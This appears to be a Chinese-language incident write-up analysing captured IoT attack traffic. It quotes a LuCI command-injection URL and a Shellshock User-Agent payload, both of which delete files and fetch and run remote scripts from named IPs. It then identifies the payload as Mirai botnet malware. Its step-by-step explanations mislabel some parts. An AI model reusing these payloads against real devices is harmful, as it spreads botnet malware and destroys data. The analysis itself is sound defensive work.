A、前言：

这是之前的一次事件截图，一登陆上安全设备就看见荷兰的这个185.191.126.213攻击IP一直在进行攻击行为。

B、第一种攻击行为分析：

案例A：
1、通过构造特定的接口再执行wget下载木马从而执行特定的命令；

https://域名或IP/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>\`wget http://103.149.86.202/t -O- | sh\`)

2、操作解释：（如果执行成功后）

a、rm -rf ：                                        删除服务器当前目录下的所有文件和子目录；
b、/cgi-bin/luci/;stok=/locale：                    LuC界面中CGI脚本的路径；
c、?form=country&operation=write&country=：         是传递给CGI脚本的参数；
d、$(id>\`wget http://103.149.86.202/t -O- | sh\`)：从这个地址下载一个脚本，并直接通过sh执行它，执行id命令；

3、微步/奇安信威胁情报平台：查询验证：可以看见相关的样本



4、从进程这里也可以发现一些：主要就是下载文件然后给权限再删除其它文件这种

C、第二种攻击行为分析：

1、示例:
利用URL路径或者查询参数注入Shell命令，在目标系统上执行删除操作并下载并执行远程恶意脚本；

https://域名或IP/cgi-bin/jarrewrite.sh 

User-Agent: () { :; }; echo ; /bin/bash -c 'rm -rf \*; cd /tmp; wget http://45.142.214.108/nigga.sh; chmod 777 nigga.sh; ./nigga.sh' Connection: close SL-CE-SUID: 25

2、操作解释：（如果执行成功后）

1. rm -rf *：删除当前目录下的所有文件 ；

2. wget http://45.142.214.108/tenda.sh：从攻击者控制的服务器下载名为tenda.sh 的脚本；

3. chmod 777 tenda.sh：给下载的脚本赋予所有用户可执行权限 ；

4. ./tenda.sh：执行该脚本；

5. -H 'User-Agent: ...'：模拟浏览器标识以欺骗服务器，使其认为请求来自特定版本的浏览器；

6. -H 'Connection: keep-alive'：设置保持连接状态，以便复用TCP连接发送多个请求；

7. -H 'SL-CE-SUID: 25'：添加自定义请求头，其含义取决于服务器的具体实现和可能存在的漏洞；

简单朔源一下：
1、用其它设备访问这个服务器下载文件，有安全软件的话会被提示有威胁的

2、代码如下：

3、IP查询：
第一个案例A的服务器IP物理位置：

第二个案例A服务器IP物理位置：

小总结(简单)：

微步在线、奇安信威胁情报中心检测结果显示该文件为一个恶意软件样本，该样本被多个反病毒引擎识别为不同变种的Mirai或与其相关的Linux僵尸网络木马；
Mirai是一种臭名昭著的物联网（IoT）恶意软件，主要针对安全性较弱的物联网设备，如路由器、摄像头等，将其感染并纳入僵尸网络中，用于发动大规模DDoS攻击。大多数安全软件厂商均将此样本识别为Mirai家族的一员；
个人判断“103.149.86.202”这应该是攻击者的一个木马库，上面挺多恶意脚本这些。